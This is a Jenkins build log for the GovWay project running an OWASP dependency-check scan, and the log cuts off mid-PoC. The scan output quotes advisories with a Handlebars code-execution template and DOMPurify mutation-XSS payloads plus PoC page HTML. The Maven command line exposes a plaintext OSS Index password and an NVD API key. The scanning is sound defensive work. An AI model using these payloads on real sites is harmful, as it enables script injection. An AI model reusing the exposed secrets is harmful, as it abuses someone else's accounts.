[INFO] Building package 1.0 [59/67] 17:37:27 [INFO] from distrib/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.utils >----------- 17:37:27 [INFO] Building testsuite.utils 1.0 [60/67] 17:37:27 [INFO] from tools/utils/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.utils.sql >--------- 17:37:27 [INFO] Building testsuite.utils.sql 1.0 [61/67] 17:37:27 [INFO] from tools/utils/mvn/sql/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core >--------- 17:37:27 [INFO] Building testsuite.pdd.core 1.0 [62/67] 17:37:27 [INFO] from core/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core.sql >------- 17:37:27 [INFO] Building testsuite.pdd.core.sql 1.0 [63/67] 17:37:27 [INFO] from core/mvn/sql/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] ------< org.openspcoop2:org.openspcoop2.static_analysis.spotbugs >------ 17:37:27 [INFO] Building static_analysis.spotbugs 1.0 [64/67] 17:37:27 [INFO] from tools/spotbugs/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] -----< org.openspcoop2:org.openspcoop2.static_analysis.sonarqube >------ 17:37:27 [INFO] Building static_analysis.sonarqube 1.0 [65/67] 17:37:27 [INFO] from tools/sonarqube/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] --------< org.openspcoop2:org.openspcoop2.dynamic_analysis.zap >-------- 17:37:27 [INFO] Building dynamic_analysis.zap 1.0 [66/67] 17:37:27 [INFO] from tools/zap/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] 17:37:27 [INFO] ----------< org.openspcoop2:org.openspcoop2.coverage.jacoco >----------- 17:37:27 [INFO] Building coverage.jacoco 1.0 [67/67] 17:37:27 [INFO] from tools/jacoco/mvn/pom.xml 17:37:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:27 [INFO] ------------------------------------------------------------------------ 17:37:27 [INFO] Reactor Summary for govway 1.0: 17:37:27 [INFO] 17:37:27 [INFO] govway ............................................. SUCCESS [ 0.004 s] 17:37:27 [INFO] dependencies ....................................... SUCCESS [ 0.001 s] 17:37:27 [INFO] dependencies.ant ................................... SUCCESS [ 2.607 s] 17:37:27 [INFO] dependencies.antinstaller .......................... SUCCESS [ 0.091 s] 17:37:27 [INFO] dependencies.angus ................................. SUCCESS [ 0.072 s] 17:37:27 [INFO] dependencies.bean-validation ....................... SUCCESS [ 0.089 s] 17:37:27 [INFO] dependencies.cxf ................................... SUCCESS [ 1.044 s] 17:37:27 [INFO] dependencies.commons ............................... SUCCESS [ 0.549 s] 17:37:27 [INFO] dependencies.console ............................... SUCCESS [ 0.088 s] 17:37:27 [INFO] dependencies.git ................................... SUCCESS [ 0.069 s] 17:37:27 [INFO] dependencies.httpcore .............................. SUCCESS [ 0.130 s] 17:37:27 [INFO] dependencies.jackson ............................... SUCCESS [ 0.195 s] 17:37:27 [INFO] dependencies.jakarta ............................... SUCCESS [ 0.223 s] 17:37:27 [INFO] dependencies.jaxb .................................. SUCCESS [ 0.134 s] 17:37:27 [INFO] dependencies.jetty ................................. SUCCESS [ 0.159 s] 17:37:27 [INFO] dependencies.jmx ................................... SUCCESS [ 0.144 s] 17:37:27 [INFO] dependencies.json .................................. SUCCESS [ 0.367 s] 17:37:27 [INFO] dependencies.log ................................... SUCCESS [ 0.225 s] 17:37:27 [INFO] dependencies.lucene ................................ SUCCESS [ 0.065 s] 17:37:27 [INFO] dependencies.openapi4j ............................. SUCCESS [ 0.125 s] 17:37:27 [INFO] dependencies.opensaml .............................. SUCCESS [ 0.191 s] 17:37:27 [INFO] dependencies.pdf ................................... SUCCESS [ 0.072 s] 17:37:27 [INFO] dependencies.redis ................................. SUCCESS [ 0.194 s] 17:37:27 [INFO] dependencies.reports ............................... SUCCESS [ 0.092 s] 17:37:27 [INFO] dependencies.saaj .................................. SUCCESS [ 0.105 s] 17:37:27 [INFO] dependencies.security .............................. SUCCESS [ 0.105 s] 17:37:27 [INFO] dependencies.shared ................................ SUCCESS [ 0.475 s] 17:37:27 [INFO] dependencies.spring ................................ SUCCESS [ 0.108 s] 17:37:27 [INFO] dependencies.spring-ldap ........................... SUCCESS [ 0.018 s] 17:37:27 [INFO] dependencies.spring-security ....................... SUCCESS [ 0.040 s] 17:37:27 [INFO] dependencies.swagger ............................... SUCCESS [ 0.167 s] 17:37:27 [INFO] dependencies.wss4j ................................. SUCCESS [ 0.108 s] 17:37:27 [INFO] dependencies.testsuite ............................. SUCCESS [ 0.000 s] 17:37:27 [INFO] dependencies.testsuite.axis14 ...................... SUCCESS [ 0.125 s] 17:37:27 [INFO] dependencies.testsuite.as .......................... SUCCESS [ 0.000 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly27 ................ SUCCESS [ 0.113 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly28 ................ SUCCESS [ 0.122 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly35 ................ SUCCESS [ 0.134 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly36 ................ SUCCESS [ 0.128 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly37 ................ SUCCESS [ 0.133 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly38 ................ SUCCESS [ 0.124 s] 17:37:27 [INFO] dependencies.testsuite.as.wildfly39 ................ SUCCESS [ 0.161 s] 17:37:27 [INFO] dependencies.testsuite.as.tomcat10 ................. SUCCESS [ 0.022 s] 17:37:27 [INFO] dependencies.testsuite.as.tomcat11 ................. SUCCESS [ 0.019 s] 17:37:27 [INFO] dependencies.testsuite.test ........................ SUCCESS [ 0.001 s] 17:37:27 [INFO] dependencies.testsuite.test.testng ................. SUCCESS [ 0.048 s] 17:37:27 [INFO] dependencies.testsuite.test.junit4 ................. SUCCESS [ 0.021 s] 17:37:27 [INFO] dependencies.testsuite.test.karate09 ............... SUCCESS [ 0.046 s] 17:37:27 [INFO] dependencies.testsuite.test.logback ................ SUCCESS [ 0.035 s] 17:37:27 [INFO] dependencies.testsuite.test.httpcore4 .............. SUCCESS [ 0.037 s] 17:37:27 [INFO] dependencies.testsuite.test.spring5 ................ SUCCESS [ 0.047 s] 17:37:27 [INFO] dependencies.testsuite.test.spring-ldap2 ........... SUCCESS [ 0.020 s] 17:37:27 [INFO] dependencies.testsuite.test.apacheds ............... SUCCESS [ 0.137 s] 17:37:27 [INFO] dependencies.testsuite.test.cxf3 ................... SUCCESS [ 0.047 s] 17:37:27 [INFO] dependencies.testsuite.staticAnalysis .............. SUCCESS [ 0.030 s] 17:37:27 [INFO] dependencies.testsuite.dynamicAnalysis ............. SUCCESS [ 0.012 s] 17:37:27 [INFO] dependencies.testsuite.coverage .................... SUCCESS [ 0.046 s] 17:37:27 [INFO] compile ............................................ SUCCESS [ 0.001 s] 17:37:27 [INFO] package ............................................ SUCCESS [ 0.000 s] 17:37:27 [INFO] testsuite.utils .................................... SUCCESS [ 0.000 s] 17:37:27 [INFO] testsuite.utils.sql ................................ SUCCESS [ 0.001 s] 17:37:27 [INFO] testsuite.pdd.core ................................. SUCCESS [ 0.000 s] 17:37:27 [INFO] testsuite.pdd.core.sql ............................. SUCCESS [ 0.001 s] 17:37:27 [INFO] static_analysis.spotbugs ........................... SUCCESS [ 0.000 s] 17:37:27 [INFO] static_analysis.sonarqube .......................... SUCCESS [ 0.000 s] 17:37:27 [INFO] dynamic_analysis.zap ............................... SUCCESS [ 0.001 s] 17:37:27 [INFO] coverage.jacoco .................................... SUCCESS [ 0.000 s] 17:37:27 [INFO] ------------------------------------------------------------------------ 17:37:27 [INFO] BUILD SUCCESS 17:37:27 [INFO] ------------------------------------------------------------------------ 17:37:27 [INFO] Total time: 10.399 s 17:37:27 [INFO] Finished at: 2026-04-07T17:37:27+02:00 17:37:27 [INFO] ------------------------------------------------------------------------ 17:37:27 [GovWay] $ /opt/apache-maven-3.9.10/bin/mvn -Dowasp.plugin.autoUpdate=true -Dpackage=none -DossIndexUsername=andrea.poli@link.it -Dcompile=none -Dowasp=verify -Dtestsuite=none -DossIndexPassword=6b31d4937d57ec65ccb3aed4ff8461107c8eeb5a -DnvdApiKey=f8281fbf-3d81-4e4a-9f03-ab68856b336d -Dowasp.plugin.failBuildOnAnyVulnerability=false verify 17:37:29 [INFO] Scanning for projects... 17:37:30 [INFO] ------------------------------------------------------------------------ 17:37:30 [INFO] Reactor Build Order: 17:37:30 [INFO] 17:37:30 [INFO] govway [pom] 17:37:30 [INFO] dependencies [pom] 17:37:30 [INFO] dependencies.ant [pom] 17:37:30 [INFO] dependencies.antinstaller [pom] 17:37:30 [INFO] dependencies.angus [pom] 17:37:30 [INFO] dependencies.bean-validation [pom] 17:37:30 [INFO] dependencies.cxf [pom] 17:37:30 [INFO] dependencies.commons [pom] 17:37:30 [INFO] dependencies.console [pom] 17:37:30 [INFO] dependencies.git [pom] 17:37:30 [INFO] dependencies.httpcore [pom] 17:37:30 [INFO] dependencies.jackson [pom] 17:37:30 [INFO] dependencies.jakarta [pom] 17:37:30 [INFO] dependencies.jaxb [pom] 17:37:30 [INFO] dependencies.jetty [pom] 17:37:30 [INFO] dependencies.jmx [pom] 17:37:30 [INFO] dependencies.json [pom] 17:37:30 [INFO] dependencies.log [pom] 17:37:30 [INFO] dependencies.lucene [pom] 17:37:30 [INFO] dependencies.openapi4j [pom] 17:37:30 [INFO] dependencies.opensaml [pom] 17:37:30 [INFO] dependencies.pdf [pom] 17:37:30 [INFO] dependencies.redis [pom] 17:37:30 [INFO] dependencies.reports [pom] 17:37:30 [INFO] dependencies.saaj [pom] 17:37:30 [INFO] dependencies.security [pom] 17:37:30 [INFO] dependencies.shared [pom] 17:37:30 [INFO] dependencies.spring [pom] 17:37:30 [INFO] dependencies.spring-ldap [pom] 17:37:30 [INFO] dependencies.spring-security [pom] 17:37:30 [INFO] dependencies.swagger [pom] 17:37:30 [INFO] dependencies.wss4j [pom] 17:37:30 [INFO] dependencies.testsuite [pom] 17:37:30 [INFO] dependencies.testsuite.axis14 [pom] 17:37:30 [INFO] dependencies.testsuite.as [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly27 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly28 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly35 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly36 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly37 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly38 [pom] 17:37:30 [INFO] dependencies.testsuite.as.wildfly39 [pom] 17:37:30 [INFO] dependencies.testsuite.as.tomcat10 [pom] 17:37:30 [INFO] dependencies.testsuite.as.tomcat11 [pom] 17:37:30 [INFO] dependencies.testsuite.test [pom] 17:37:30 [INFO] dependencies.testsuite.test.testng [pom] 17:37:30 [INFO] dependencies.testsuite.test.junit4 [pom] 17:37:30 [INFO] dependencies.testsuite.test.karate09 [pom] 17:37:30 [INFO] dependencies.testsuite.test.logback [pom] 17:37:30 [INFO] dependencies.testsuite.test.httpcore4 [pom] 17:37:30 [INFO] dependencies.testsuite.test.spring5 [pom] 17:37:30 [INFO] dependencies.testsuite.test.spring-ldap2 [pom] 17:37:30 [INFO] dependencies.testsuite.test.apacheds [pom] 17:37:30 [INFO] dependencies.testsuite.test.cxf3 [pom] 17:37:30 [INFO] dependencies.testsuite.staticAnalysis [pom] 17:37:30 [INFO] dependencies.testsuite.dynamicAnalysis [pom] 17:37:30 [INFO] dependencies.testsuite.coverage [pom] 17:37:30 [INFO] compile [pom] 17:37:30 [INFO] package [pom] 17:37:30 [INFO] testsuite.utils [pom] 17:37:30 [INFO] testsuite.utils.sql [pom] 17:37:30 [INFO] testsuite.pdd.core [pom] 17:37:30 [INFO] testsuite.pdd.core.sql [pom] 17:37:30 [INFO] static_analysis.spotbugs [pom] 17:37:30 [INFO] static_analysis.sonarqube [pom] 17:37:30 [INFO] dynamic_analysis.zap [pom] 17:37:30 [INFO] coverage.jacoco [pom] 17:37:30 [INFO] 17:37:30 [INFO] ------------------< org.openspcoop2:org.openspcoop2 >------------------- 17:37:30 [INFO] Building govway 1.0 [1/67] 17:37:30 [INFO] from pom.xml 17:37:30 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:30 [INFO] 17:37:30 [INFO] ------------< org.openspcoop2:org.openspcoop2.dependencies >------------ 17:37:30 [INFO] Building dependencies 1.0 [2/67] 17:37:30 [INFO] from mvn/dependencies/pom.xml 17:37:30 [INFO] --------------------------------[ pom ]--------------------------------- 17:37:30 [INFO] 17:37:30 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.dependencies --- 17:37:31 [INFO] Executing tasks 17:37:36 [INFO] Executed tasks 17:37:40 [INFO] 17:37:40 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.dependencies --- 17:37:50 [INFO] Checking for updates 17:37:51 [WARNING] NVD API request failures are occurring; retrying request for the 1st time 17:37:55 [INFO] NVD API has 1,135 records in this update 17:37:56 [INFO] Downloaded 1,135/1,135 (100%) 17:38:01 [INFO] Completed processing batch 1/1 (100%) in 4,852ms 17:38:01 [INFO] Updating CISA Known Exploited Vulnerability list: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json 17:38:02 [INFO] Begin database defrag 17:38:13 [INFO] End database defrag (11046 ms) 17:38:13 [INFO] Check for updates complete (23058 ms) 17:38:13 [INFO] 17:38:13 17:38:13 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:38:13 17:38:13 17:38:13 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:38:13 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:38:13 17:38:13 17:38:13 [INFO] Analysis Started 17:38:16 [INFO] Finished Archive Analyzer (3 seconds) 17:38:16 [INFO] Finished File Name Analyzer (0 seconds) 17:38:18 [INFO] Finished Jar Analyzer (2 seconds) 17:38:18 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:38:19 [INFO] Finished Hint Analyzer (0 seconds) 17:38:19 [INFO] Finished Version Filter Analyzer (0 seconds) 17:38:20 [INFO] Using MemorySegmentIndexInput and native madvise support with Java 21 or later; to disable start with -Dorg.apache.lucene.store.MMapDirectory.enableMemorySegments=false 17:38:20 [WARNING] Java vector incubator module is not readable. For optimal vector performance, pass '--add-modules jdk.incubator.vector' to enable Vector API. 17:38:23 [INFO] Created CPE Index (4 seconds) 17:38:32 [INFO] Finished CPE Analyzer (13 seconds) 17:38:32 [INFO] Finished False Positive Analyzer (0 seconds) 17:38:32 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:38:53 [INFO] Finished RetireJS Analyzer (20 seconds) 17:38:53 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:38:53 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:38:54 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:38:54 17:38:54 17:38:54 ## Recommendation 17:38:54 17:38:54 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:38:54 17:38:54 The following template can be used to demonstrate the vulnerability: 17:38:54 ```{{#with "constructor"}} 17:38:54 {{#with split as |a|}} 17:38:54 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:38:54 {{#with (concat (lookup join (slice 0 1)))}} 17:38:54 {{#each (slice 2 3)}} 17:38:54 {{#with (apply 0 a)}} 17:38:54 {{.}} 17:38:54 {{/with}} 17:38:54 {{/each}} 17:38:54 {{/with}} 17:38:54 {{/with}} 17:38:54 {{/with}}``` 17:38:54 17:38:54 17:38:54 ## Recommendation 17:38:54 17:38:54 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:38:54 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:38:54 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:38:54 [INFO] Analysis Complete (41 seconds) 17:38:54 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-report.xml 17:38:56 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-report.html 17:38:57 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-report.json 17:38:57 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-report.csv 17:38:57 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-report.sarif 17:38:57 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-jenkins.html 17:38:57 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-junit.xml 17:38:58 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/dependency-check-result/dependency-check-gitlab.json 17:38:58 [WARNING] 17:38:58 17:38:58 One or more dependencies were identified with known vulnerabilities in dependencies: 17:38:58 17:38:58 swagger-ui-5.24.1-1.jar: swagger-ui-bundle.js (pkg:javascript/DOMPurify@3.2.4) : ## Description 17:38:58 17:38:58 A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). 17:38:58 17:38:58 17:38:58 ## Vulnerability 17:38:58 17:38:58 The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). 17:38:58 17:38:58 ## PoC 17:38:58 17:38:58 1. Start the PoC app: 17:38:58 ```bash 17:38:58 npm install 17:38:58 npm start 17:38:58 ``` 17:38:58 17:38:58 2. Open `http://localhost:3001`. 17:38:58 3. Set `Wrapper en sink` to `xmp`. 17:38:58 4. Use payload: 17:38:58 ```html 17:38:58 <img src=x alt="</xmp><img src=x onerror=alert('expoc')>"> 17:38:58 ``` 17:38:58 17:38:58 5. Click `Sanitize + Render`. 17:38:58 6. Observe: 17:38:58 - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. 17:38:58 - The sink reparses to include `<img src="x" onerror="alert('expoc')">`. 17:38:58 - `alert('expoc')` is triggered. 17:38:58 7. Files: 17:38:58 - index.html 17:38:58 17:38:58 ```html 17:38:58 <!doctype html> 17:38:58 <html lang="en"> 17:38:58 <head> 17:38:58 <meta charset="utf-8"> 17:38:58 <meta name="viewport" content="width=device-width, initial-scale=1"> 17:38:58 <title>expoc - DOMPurify SSR PoC</title> 17:38:58 <style> 17:38:58 :root { 17:38:58 --bg: #f7f8fb; 17:38:58 --panel: #ffffff; 17:38:58 --line: #d8dce6; 17:38:58 --text: #0f172a; 17:38:58 --muted: #475569; 17:38:58 --accent: #0ea5e9; 17:38:58 } 17:38:58 17:38:58 * { 17:38:58 box-sizing: border-box; 17:38:58 } 17:38:58 17:38:58 body { 17:38:58 margin: 0; 17:38:58 font-family: "SF Mono", Menlo, Consolas, monospace; 17:38:58 color: var(--text); 17:38:58 background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); 17:38:58 } 17:38:58 17:38:58 main { 17:38:58 max-width: 980px; 17:38:58 margin: 28px auto; 17:38:58 padding: 0 16px 20px; 17:38:58 } 17:38:58 17:38:58 h1 { 17:38:58 margin: 0 0 10px; 17:38:58 font-size: 1.45rem; 17:38:58 } 17:38:58 17:38:58 p { 17:38:58 margin: 0; 17:38:58 color: var(--muted); 17:38:58 } 17:38:58 17:38:58 .grid { 17:38:58 display: grid; 17:38:58 gap: 14px; 17:38:58 margin-top: 16px; 17:38:58 } 17:38:58 17:38:58 .card { 17:38:58 background: var(--panel); 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 12px; 17:38:58 padding: 14px; 17:38:58 } 17:38:58 17:38:58 label { 17:38:58 display: block; 17:38:58 margin-bottom: 7px; 17:38:58 font-size: 0.85rem; 17:38:58 color: var(--muted); 17:38:58 } 17:38:58 17:38:58 textarea, 17:38:58 input, 17:38:58 select, 17:38:58 button { 17:38:58 width: 100%; 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 8px; 17:38:58 padding: 9px 10px; 17:38:58 font: inherit; 17:38:58 background: #fff; 17:38:58 } 17:38:58 17:38:58 textarea { 17:38:58 min-height: 110px; 17:38:58 resize: vertical; 17:38:58 } 17:38:58 17:38:58 .row { 17:38:58 display: grid; 17:38:58 grid-template-columns: 1fr 230px; 17:38:58 gap: 12px; 17:38:58 } 17:38:58 17:38:58 button { 17:38:58 cursor: pointer; 17:38:58 background: var(--accent); 17:38:58 color: #fff; 17:38:58 border-color: #0284c7; 17:38:58 } 17:38:58 17:38:58 #sink { 17:38:58 min-height: 90px; 17:38:58 border: 1px dashed #94a3b8; 17:38:58 border-radius: 8px; 17:38:58 padding: 10px; 17:38:58 background: #f8fafc; 17:38:58 } 17:38:58 17:38:58 pre { 17:38:58 margin: 0; 17:38:58 white-space: pre-wrap; 17:38:58 word-break: break-word; 17:38:58 } 17:38:58 17:38:58 .note { 17:38:58 margin-top: 8px; 17:38:58 font-size: 0.85rem; 17:38:58 } 17:38:58 17:38:58 .status-grid { 17:38:58 display: grid; 17:38:58 grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); 17:38:58 gap: 8px; 17:38:58 margin-top: 10px; 17:38:58 } 17:38:58 17:38:58 .status-item { 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 8px; 17:38:58 padding: 8px 10px; 17:38:58 font-size: 0.85rem; 17:38:58 background: #fff; 17:38:58 } 17:38:58 17:38:58 .status-item.vuln { 17:38:58 border-color: #ef4444; 17:38:58 background: #fef2f2; 17:38:58 } 17:38:58 17:38:58 .status-item.safe { 17:38:58 border-color: #22c55e; 17:38:58 background: #f0fdf4; 17:38:58 } 17:38:58 17:38:58 @media (max-width: 760px) { 17:38:58 .row { 17:38:58 grid-template-columns: 1fr; 17:38:58 } 17:38:58 } 17:38:58 </style> 17:38:58 </head> 17:38:58 <body> 17:38:58 <main> 17:38:58 <h1>expoc - DOMPurify Server-Side PoC</h1> 17:38:58 <p> 17:38:58 Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. 17:38:58 </p> 17:38:58 17:38:58 <div class="grid"> 17:38:58 <section class="card"> 17:38:58 <label for="payload">Payload</label> 17:38:58 <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"></textarea> 17:38:58 <div class="row" style="margin-top: 10px;"> 17:38:58 <div> 17:38:58 <label for="wrapper">Wrapper en sink</label> 17:38:58 <select id="wrapper"> 17:38:58 <option value="div">div</option> 17:38:58 <option value="textarea">textarea</option> 17:38:58 <option value="title">title</option> 17:38:58 <option value="style">style</option> 17:38:58 <option value="script" selected>script</option> 17:38:58 <option value="xmp">xmp</option> 17:38:58 <option value="iframe">iframe</option> 17:38:58 <option value="noembed">noembed</option> 17:38:58 <option value="noframes">noframes</option> 17:38:58 <option value="noscript">noscript</option> 17:38:58 </select> 17:38:58 </div> 17:38:58 <div style="display:flex;align-items:end;"> 17:38:58 <button id="run" type="button">Sanitize + Render</button> 17:38:58 </div> 17:38:58 </div> 17:38:58 <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p> 17:38:58 <div class="status-grid"> 17:38:58 <div class="status-item vuln">script (vulnerable)</div> 17:38:58 <div class="status-item vuln">xmp (vulnerable)</div> 17:38:58 <div class="status-item vuln">iframe (vulnerable)</div> 17:38:58 <div class="status-item vuln">noembed (vulnerable)</div> 17:38:58 <div class="status-item vuln">noframes (vulnerable)</div> 17:38:58 <div class="status-item vuln">noscript (vulnerable)</div> 17:38:58 <div class="status-item safe">div (no vulnerable)</div> 17:38:58 <div class="status-item safe">textarea (no vulnerable)</div> 17:38:58 <div class="status-item safe">title (no vulnerable)</div> 